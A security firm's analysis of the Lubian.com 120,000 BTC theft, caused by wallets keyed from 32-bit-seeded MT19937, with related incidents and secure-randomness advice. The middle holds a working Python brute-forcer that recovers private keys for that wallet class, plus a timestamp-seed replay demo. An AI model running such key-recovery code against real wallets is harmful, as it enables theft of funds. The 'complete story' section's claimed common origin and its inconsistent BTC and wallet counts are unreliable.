When randomness is no longer random: The truth behind the theft of 120,000 BTC
Original source: Max He@Safeheron Lab
Recently, the cryptocurrency community has been discussing a major piece of news: U.S. law enforcement is suspected of having obtained the private keys to roughly 120,000 bitcoins, worth up to $15 billion, that were involved in a mysterious transfer in 2020. According to a report by Elliptic, these assets were originally associated with the mining pool Lubian.com and were later formally confiscated by the U.S. Department of Justice. There is widespread speculation that law enforcement exploited a flaw in the random number generation used when the wallets were created to reconstruct or take over the private keys; some go further and describe the whole affair as a hacking operation run by the U.S. government.
The news sent a shock through the industry and quickly became a focal topic. It has sparked debate not only about the technical and security aspects but also about how reliable crypto assets are and how their risks should be managed. This article works through the event and its underlying security root cause from both a technical and a factual perspective: the key technical details, a full review of how the event unfolded, and its potential long-term impact.
Random Numbers and Private Key Security: The Lifeline of the Blockchain World
In the blockchain world, random numbers are the cornerstone of cryptographic security. Every Bitcoin or Ethereum private key is derived from random numbers; if those numbers lack sufficient entropy, an attacker can reproduce them and, with them, the private key, and then spend the funds directly. To mitigate this risk, wallets must use a cryptographically secure random number generator (CSPRNG) so that the values they produce are unpredictable and cannot be reproduced by anyone else.
A wallet that relies on an insecure random algorithm may appear to work normally, but it carries a hidden defect: once the randomness is predicted, the loss of assets is irreversible.
History Repeats Itself: Insights from Multiple Major Security Incidents
Between 2022 and 2023, several major security incidents caused by the same class of randomness flaw were disclosed one after another, exposing how severe and widespread this problem is.
Security Incident 1: Wintermute's painful lesson of losing 160 million dollars
On September 20, 2022, the well-known market maker Wintermute suffered a major security incident in which roughly $160 million in digital assets were stolen. The attackers exploited a weakness in the address generation tool Profanity, which seeded its Mersenne Twister pseudorandom number generator from only 32 bits of entropy when producing "vanity addresses."
Because the output of a Mersenne Twister is fully determined by its seed, and a 32-bit seed space can be exhausted by brute force, attackers were able to replay the address and private key generation process, compute the private key behind the vanity address, and transfer the funds. This case became a landmark in cryptocurrency history as the first instance of an institutional wallet being breached through the misuse of random numbers, marking the point at which randomness flaws evolved from a matter of developer negligence into a systemic security risk.
Safeheron published a detailed technical analysis of this attack at the time and reproduced the attack process.
Security Incident 2: Trust Wallet Random Number Vulnerability Causes Trust Crisis
In April 2023, security researchers found that the Trust Wallet browser extension (versions 0.0.172 to 0.0.182) generated wallet mnemonic phrases with a non-cryptographic random function, again based on the Mersenne Twister (MT19937) algorithm (see the figure below), seeded from a space of only about 2^32 values, far too small to resist brute force.
An attacker can enumerate all 2^32 candidate mnemonics in a limited time, reconstruct the private keys and steal user assets. Trust Wallet subsequently published an announcement confirming the vulnerability and urging affected users to migrate their assets promptly. According to an official statement on the project's community forum, the vulnerability caused approximately $170,000 in losses, attributed to attackers who appear to have exploited it in targeted attacks.
This incident was the first case of a random number vulnerability affecting the end users of a mainstream wallet, and the first time that "random number security" drew broad public attention.
Security Incident 3: Libbitcoin Explorer (bx seed) Weak Random Number Incident
In August 2023, the security research team Distrust disclosed a severe randomness vulnerability in version 3.x of the command-line tool Libbitcoin Explorer (bx). When executing the bx seed command to generate a wallet seed, the tool used the Mersenne Twister (MT19937) pseudorandom number generator internally and seeded it solely from the system time, so its output had very little entropy and was predictable. An attacker can enumerate every possible seed value in a limited time, reconstruct the wallet's private key, and steal its assets directly.
The vulnerability affects every user who generated a wallet with Libbitcoin Explorer 3.x, as well as applications that depend on the libbitcoin-system 3.6 library. As of August 2023, more than $900,000 in cryptocurrency had been stolen through it. After disclosure it was registered as CVE-2023-39910.
Although Libbitcoin Explorer was patched promptly, the matter did not end there.
The Huge Iceberg Rising Above the Water
After the Libbitcoin Explorer 3.x disclosure, a white-hat research team led by Distrust set up the MilkSad project to keep tracking the impact of the vulnerability and to coordinate the community response.
By 2024, the researchers had for the first time systematically described the generation mechanisms, wallet types and pseudorandom number generator (PRNG) configurations of these "weak wallets," revealing their possible connection to the Bitcoin mining pool Lubian.com and the distribution pattern of the related funds.
In 2025, key clues provided by an anonymous white-hat researcher broke a long-stalled analysis open. The MilkSad team discovered that the affected software introduced an additional parameter, the PRNG offset, when generating private keys. This finding let the researchers link previously scattered groups of wallets and revealed a single random number generation pattern behind them; it became the key to understanding the cause of the entire "weak wallet" incident.
According to the team's further analysis, the 2,630 problem wallets initially found in 2023 were only the tip of the iceberg. By searching different segments of the PRNG output, the researchers have now reconstructed and identified over 227,200 distinct wallets (as shown in the figure below), all with genuine usage records on mainnet, forming the largest cluster of "weak random wallets" found to date.
On-chain data shows that the wallets generated by this randomness defect held approximately 137,000 bitcoins (BTC). Within two hours on December 28, 2020, they were emptied in a coordinated sweep: the balance fell from 137,000 BTC to under 200, with about 9,500 BTC going to the mining pool Lubian's payout address and the remaining roughly 120,000 BTC presumed to have gone to wallets controlled by the attacker. All of the suspicious transactions paid the same fee, a clear sign of automated bulk transfers.
New clues have since emerged that further confirm the theft actually took place. Researchers found that some victim wallets showed unusual transaction activity on the Bitcoin mainnet on July 3, 2022 and July 25, 2024. These transactions embedded the exact same message via the OP_RETURN mechanism:
“MSG from LB. To the whitehat who is saving our asset, you can contact us through 1228btc@gmail.com to discuss the return of asset and your reward.”
Researchers speculate that "LB" refers to Lubian.com and that "saving our asset" points to the mass transfer of December 28, 2020. The message was broadcast several times to different addresses, apparently an attempt by Lubian to reach the "white hat" holding the assets and negotiate their return and a reward.
However, because the private keys of these wallets have long been compromised, anyone can in principle send transactions or write messages from these addresses, so it cannot be confirmed whether this message really came from the Lubian team or was a misdirection or prank.
At this point, the main body of the iceberg has finally surfaced — a systemic vulnerability caused by a random number defect has developed into one of the largest and most far-reaching security incidents in Bitcoin's history.
Technical Details: The Complete Process of Bruteforcing 220,000 BTC Wallets
So how were these 220,000 weak random BTC wallets generated? Let's walk through the search process step by step.
Step 1: Use the same pseudorandom number generator (PRNG), MT19937, to generate the random numbers. Again, this PRNG offers no cryptographic security.
Step 2: Initialize MT19937 with a very low-entropy seed, an integer between 0 and 2^32-1. This 32-bit seed space is the main reason these private keys can be recovered so quickly.
Step 3: MT19937 outputs a 32-bit integer in each round, but not all of it is used: only the highest 8 bits are kept, so each round yields one byte of seed material.
Step 4: Introduce the OFFSET parameter to widen the range of private keys. A BTC private key seed is 32 bytes (256 bits, the equivalent of a 24-word mnemonic), and those 32 bytes are taken from rounds 32 * OFFSET through 32 * OFFSET + 31 of the generator. Concretely:
(1) Rounds 0 to 31 yield one 32-byte private key seed.
(2) Rounds 32 to 63 yield the next 32-byte private key seed.
(3) Rounds 64 to 95 yield the next one.
(4) And so on; OFFSET can be as large as 3232.
Step 5: From the private key seed, use the public BIP32 wallet derivation algorithm to derive the child key pair at the derivation path m/49'/0'/0'/0/0.
Step 6: From the child public key, generate a P2WPKH-nested-in-P2SH address, which begins with the prefix 3.
Step 7: If the generated address has actually been used on-chain, a weak random wallet has been found. Record the address and its private key.
The whole search is deterministic; the only unknowns are the low-entropy seed, with 2^32 possibilities, and the small OFFSET. That is vastly smaller than the 2^256 space of a standard BTC private key, so all 220,000 weak random wallets and their private keys can be recovered by brute force.
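The seven steps above, carried through end to end as an added example (this is not MilkSad's or Safeheron's code). It reimplements MT19937 so that the seeding matches C++ std::mt19937 rather than Python's random module, keeps the top byte of each output, slices the stream into 32-byte OFFSET windows, derives m/49'/0'/0'/0/0 with a minimal BIP32/secp256k1 implementation, and encodes the P2SH-wrapped P2WPKH address. Assumptions: Python 3.8 or newer (for pow(x, -1, p)), and a hashlib built with OpenSSL support for ripemd160; the victim address in the demo is constructed from seed 5489 / OFFSET 1, where a real search would use the set of funded addresses observed on mainnet.

```python
import hashlib
import hmac
# Steps 1-2: std::mt19937 seeded with one 32-bit integer, as bx seed did. Reimplemented
# because Python's random.seed(int) initialises differently and gives another stream.
class MT19937:
    def __init__(self, seed32):
        self.mt = [seed32 & 0xFFFFFFFF]
        for i in range(1, 624):
            prev = self.mt[-1]
            self.mt.append((1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF)
        self.i = 624

    def next_u32(self):
        if self.i >= 624:  # regenerate the 624-word state ("twist")
            for j in range(624):
                y = (self.mt[j] & 0x80000000) | (self.mt[(j + 1) % 624] & 0x7FFFFFFF)
                self.mt[j] = self.mt[(j + 397) % 624] ^ (y >> 1) ^ (0x9908B0DF * (y & 1))
            self.i = 0
        y = self.mt[self.i]
        self.i += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        return (y ^ (y >> 18)) & 0xFFFFFFFF
# Steps 3-4: keep only the top byte of each output; window k (the OFFSET) is the
# 32 bytes produced by rounds 32k .. 32k+31 of the same stream.
def weak_seed_windows(seed32, max_offset):
    rng = MT19937(seed32)
    return [bytes(rng.next_u32() >> 24 for _ in range(32)) for _ in range(max_offset + 1)]
# Step 5: BIP32 over secp256k1 (minimal affine arithmetic; a demo, not constant-time).
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)
H = 0x80000000  # hardened-index flag

def ec_add(p, q):
    if p is None or q is None:
        return p or q
    if p[0] == q[0] and (p[1] + q[1]) % P == 0:
        return None  # p + (-p) = point at infinity
    lam = (3 * p[0] * p[0] * pow(2 * p[1], -1, P) if p == q
           else (q[1] - p[1]) * pow(q[0] - p[0], -1, P)) % P
    x = (lam * lam - p[0] - q[0]) % P
    return x, (lam * (p[0] - x) - p[1]) % P
def ec_mul(k, point=G):  # double-and-add
    r = None
    while k:
        r, point, k = (ec_add(r, point) if k & 1 else r), ec_add(point, point), k >> 1
    return r
def pubkey(priv):  # 33-byte compressed SEC1 encoding
    x, y = ec_mul(priv)
    return bytes([2 + (y & 1)]) + x.to_bytes(32, "big")
def bip32_master(seed):
    I = hmac.new(b"Bitcoin seed", seed, hashlib.sha512).digest()
    return int.from_bytes(I[:32], "big"), I[32:]
def bip32_ckd(k, chain, index):  # private child key; hardened when index >= H
    parent = b"\x00" + k.to_bytes(32, "big") if index >= H else pubkey(k)
    I = hmac.new(chain, parent + index.to_bytes(4, "big"), hashlib.sha512).digest()
    return (int.from_bytes(I[:32], "big") + k) % N, I[32:]  # IL >= N / k == 0 cases omitted
def derive_bip49_first_key(seed, path=(49 + H, H, H, 0, 0)):  # m/49'/0'/0'/0/0
    k, chain = bip32_master(seed)
    for index in path:
        k, chain = bip32_ckd(k, chain, index)
    return k

# Step 6: P2SH-wrapped P2WPKH ("3..." address). hashlib's ripemd160 needs OpenSSL support
# (assumed here); on a build without it, drop in a pure-Python RIPEMD-160 instead.
def hash160(data):
    return hashlib.new("ripemd160", hashlib.sha256(data).digest()).digest()
def base58check(payload):
    alphabet = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
    data = payload + hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    n, out = int.from_bytes(data, "big"), ""
    while n:
        n, r = divmod(n, 58)
        out = alphabet[r] + out
    return "1" * (len(data) - len(data.lstrip(b"\x00"))) + out
def p2sh_p2wpkh_address(pub):
    redeem_script = b"\x00\x14" + hash160(pub)  # OP_0 PUSH20 <pubkey hash>
    return base58check(b"\x05" + hash160(redeem_script))  # version 0x05 -> prefix "3"

# Step 7: enumerate (seed, OFFSET) pairs; in a real search the target set is the addresses seen on mainnet.
def search(target_addresses, seeds, max_offset):
    hits = []
    for s in seeds:
        for off, seed_bytes in enumerate(weak_seed_windows(s, max_offset)):
            k = derive_bip49_first_key(seed_bytes)
            addr = p2sh_p2wpkh_address(pubkey(k))
            if addr in target_addresses:
                hits.append({"address": addr, "seed32": s, "offset": off, "privkey": k})
    return hits

if __name__ == "__main__":
    # Constructed target: the address a victim would have got from seed 5489, OFFSET 1.
    victim = p2sh_p2wpkh_address(pubkey(derive_bip49_first_key(weak_seed_windows(5489, 1)[1])))
    for hit in search({victim}, range(5480, 5500), max_offset=2):
        print(hit["address"], "seed32 =", hit["seed32"], "OFFSET =", hit["offset"], "privkey =", hex(hit["privkey"]))
```

The demo sweeps 20 seeds and three OFFSET windows and recovers the victim's private key in about a second of pure Python; the full 2^32 seed space with every OFFSET is the same loop at scale, which is why a GPU or a cluster finishes it. Note that each OFFSET window is a continuation of one MT19937 stream, not a fresh seed, so one generator run per seed serves every OFFSET.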
The Complete Story Behind It All
Let’s fully outline the development of the entire event.
As early as 2018, some digital asset projects mistakenly adopted pseudorandom number generators (PRNGs) with no cryptographic security and applied them to the highly sensitive task of generating wallet private keys. Because the developers of the time did not understand cryptographic security well, the mistake went unnoticed and laid the groundwork for later large-scale vulnerabilities.
Over time, this flaw was discovered and maliciously exploited by hackers. Different attack groups launched several well-known attacks on the same principle, including the Wintermute theft, the Trust Wallet random number vulnerability and the Libbitcoin weak wallet incident. Together these attacks caused hundreds of millions of dollars in losses and turned "random number security," a technical detail that had been overlooked, into an industry focal point.
While analyzing what these events had in common, researchers found that all of the victim wallets shared similar randomness flaws, which could be traced back to the earlier Lubian mining pool theft. Further research confirmed that the wallets used by Lubian also relied on an insecure random number generation mechanism, making them part of the same "weak wallet" group. Subsequent systematic analysis revealed an even more striking fact: there are roughly 220,000 weak random wallets across the network, involving a total of 120,000 BTC, constituting the largest and most far-reaching random number security incident to date.
As for the rumor that "the U.S. Department of Justice was behind the Lubian.com hack," it mainly stems from one suggestive fact: while the Department of Justice was officially handling the related assets, the long-dormant Lubian-associated Bitcoin addresses suddenly saw large transfers. The timing of these transfers and the direct link between the on-chain addresses led many observers to suspect that the government had brute-forced the private keys. There is another possibility: that the U.S. government did not brute-force the keys itself but instead gained control over the individuals or entities holding them, and thereby arranged the transfer.
Although these are weak random wallets whose private keys can in theory be reproduced by technical means, there is so far no public, verifiable evidence that the U.S. government carried out a brute-force attack on the corresponding keys. Unless the relevant authorities officially acknowledge a technical intervention, the true course of events will remain unclear.
How to obtain cryptographically secure random numbers?
Having recognized the importance of secure random numbers, how should they be obtained correctly in real development? The following principles apply:
(1) Prefer the secure interfaces provided by the operating system, which draw on the system entropy pool.
(2) Where available, use a secure hardware entropy source, such as the hardware random number instructions of Intel CPUs (RDRAND/RDSEED), which are also usable from inside an SGX enclave.
(3) In an MPC setting, combine several entropy sources to raise overall security, for example the Linux system entropy pool together with the hardware random number generator of an Intel SGX CPU, so that the failure or prediction of a single source does not compromise the result.
(4) Use the secure random number interfaces of widely validated cryptographic libraries such as libsodium, BoringSSL or OpenSSL.
(5) Make sure the seed carries at least 128 to 256 bits of entropy, and never use low-entropy values such as timestamps or process IDs as seeds.
(6) Never use non-cryptographic pseudorandom number generators (non-CSPRNGs) such as Mersenne Twister (MT19937), Math.random() or rand() for key material.
Advantages of Multi-Source Entropy Fusion in MPC
Compared with a single-party system, MPC has a natural advantage in entropy fusion: each participant independently contributes its own random entropy, and the final random value is generated jointly by all parties. As long as any one party is honest, the randomness of the whole system cannot be predicted or manipulated. This multi-source structure substantially improves the system's security and tamper resistance and is one of the core security advantages of MPC protocols.
Safeheron has built a digital asset custody protocol on MPC and TEE technology. In this design, the participants in the MPC protocol draw on several independent secure entropy sources, including the Linux system entropy pool and TEE hardware entropy sources (such as the Intel SGX hardware random number instructions). This multi-source entropy fusion not only strengthens the system's security boundary but also sets a higher security baseline for the trusted execution environment (TEE) and the distributed signing system built on it.
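An added example, not Safeheron's code, illustrating principles (5) and (6) above and the multi-source entropy fusion just described: the anti-pattern of a key seeded from a timestamp (Python's random module is itself MT19937), the attacker's replay of the timestamp window that recovers it, and a hardened combiner that folds independent contributions through HMAC-SHA256 so that one honest source suffices. The creation timestamp and the zero-filled "hardware share" are constructed inputs; the extra sources passed to secure_keygen stand in for a TEE RNG or another MPC party's share and are hypothetical.

```python
import hashlib
import hmac
import os
import random

# The anti-pattern: key material from a PRNG seeded with a timestamp. Python's
# random.Random is MT19937 (the same non-cryptographic generator behind the incidents
# above) and a Unix timestamp is a ~31-bit seed at best.
def weak_keygen(seed_time):
    return random.Random(seed_time).getrandbits(256).to_bytes(32, "big")

def recover_weak_key(target_key, approx_time, window_seconds):
    """Attacker's view: knowing roughly when the key was made (a block timestamp,
    a signup date), replay every candidate second until the output matches."""
    for t in range(approx_time - window_seconds, approx_time + window_seconds + 1):
        if weak_keygen(t) == target_key:
            return t
    return None

# The hardened pattern: fold several independent sources through a keyed hash.
def combine_entropy(sources, tag=b"wallet-seed-v1"):
    """HMAC-SHA256 over length-prefixed contributions. If at least one source is
    uniformly random and unknown to the attacker, the output is too, even when every
    other source is constant, predictable or chosen by the attacker."""
    if any(len(s) < 16 for s in sources):
        raise ValueError("each contribution must carry at least 128 bits")
    mac = hmac.new(tag, digestmod=hashlib.sha256)
    for s in sources:
        mac.update(len(s).to_bytes(4, "big"))  # length prefix: no boundary ambiguity
        mac.update(s)
    return mac.digest()

def secure_keygen(extra_sources=()):
    """32 bytes of seed material: the OS entropy pool plus any extra contributions
    (a TEE hardware RNG, another MPC party's share; hypothetical, supplied by the caller)."""
    return combine_entropy([os.urandom(32), *extra_sources])

if __name__ == "__main__":
    made_at = 1_700_000_000  # constructed creation time of the victim key
    leaked = weak_keygen(made_at)
    print("weak key recovered, seed time =", recover_weak_key(leaked, made_at + 1800, 3600))
    # Constructed stand-in for a hardware RNG share; even an all-zero share does not
    # weaken the result because os.urandom still contributes unpredictable bytes.
    hw_share = bytes(32)
    print("secure seed:", secure_keygen([hw_share]).hex())
```

The recovery loop tries 7,201 candidate seconds and finds the key in well under a second; a two-year window is still only about 2^26 candidates. The combiner is the same idea the MPC protocol applies across parties: order, length and value of every contribution are bound into the digest, and an attacker who controls all but one of them learns nothing about the output.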
Conclusion
The seemingly mysterious "120,000 bitcoin theft" did not reveal a break of any cryptographic algorithm; it revealed that early developers used a non-cryptographic random number generator in private key generation, which undermined the security of the entire system at its root.
The security of crypto assets ultimately rests on the rigor of the cryptographic implementation. Any small engineering oversight can be exploited by attackers and end up deciding who owns the assets. Only by securing random numbers at the source, with trusted entropy sources and verified cryptographic libraries, can "randomness" mean what it should: unpredictable and unreproducible.